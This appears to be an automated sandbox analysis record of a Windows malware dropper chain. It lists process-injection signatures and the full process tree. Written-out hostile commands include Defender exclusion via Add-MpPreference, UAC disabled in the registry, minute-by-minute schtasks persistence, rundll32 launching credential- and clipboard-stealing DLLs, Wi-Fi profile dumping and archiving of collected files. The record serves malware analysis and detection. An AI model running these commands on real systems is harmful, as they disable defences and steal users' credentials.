N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4136 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 4136 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 4136 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 2804 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
PID 2804 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
PID 2804 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
PID 2804 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe
PID 2804 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe
PID 2804 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe
PID 1692 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1692 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 4336 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 4336 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3392 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 2844 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4724 wrote to memory of 3464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe

"C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe"

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"

C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe

"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"

C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe

"C:\Users\Admin\AppData\Local\Temp\1000016001\43bad8026a.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd7f96cc40,0x7ffd7f96cc4c,0x7ffd7f96cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1824,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2132 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2632 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3132 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3100,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4556 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3416,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3644 /prefetch:1

C:\Users\Admin\1000017002\dfb8c0b47f.exe

"C:\Users\Admin\1000017002\dfb8c0b47f.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4724,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4660 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4748,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4756 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3672,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5084 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5244,i,7304043237956197470,10894556565673156053,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5288 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5836 -ip 5836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 868

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 452 -ip 452

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 452 -s 376

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5784 -ip 5784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 364

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe

"C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv b/QtmM2yLUCZvFaxJuz1Eg.0.2

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe

"C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"

C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\818691465304_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"

C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe

"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe

"C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'

C:\Users\Admin\Pictures\RZyn7DqIafXJbV2YZWLCctRp.exe

"C:\Users\Admin\Pictures\RZyn7DqIafXJbV2YZWLCctRp.exe"

C:\Users\Admin\Pictures\rv0CjDtwBKyi999hPegyjpUA.exe

"C:\Users\Admin\Pictures\rv0CjDtwBKyi999hPegyjpUA.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'

C:\Users\Admin\Pictures\fbYbrYobrVYR9qvSaVaTozz0.exe

"C:\Users\Admin\Pictures\fbYbrYobrVYR9qvSaVaTozz0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"

C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe

"C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe" --silent --allusers=0

C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe

C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a4,0x2ac,0x2b0,0x2a8,0x2b4,0x6c70e1d0,0x6c70e1dc,0x6c70e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\AYIMY5pgjRasql7ilmopJ53h.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\AYIMY5pgjRasql7ilmopJ53h.exe" --version

C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe

"C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1968 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240429154230" --session-guid=f8d775c8-1b57-4d5f-bb65-5daf7e75c917 --server-tracking-blob="OWY2MTcxNzQ2NzlhNTY2MWYzZjhkNDIyMzAzOGMxODY0MjNjNTFiYWFkMWNlNDJiNTYyZTRkNzkxMmQxYTQxYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0NDA1MzQ2LjU0NzAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMDhhODY0MjktOGJhMi00Y2EyLTlkNzYtMGUwNTdjOGY0OGNlIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1405000000000000

C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe

C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a8,0x6bd8e1d0,0x6bd8e1dc,0x6bd8e1e8

C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe

"C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe"

C:\Windows\system32\svchost.exe

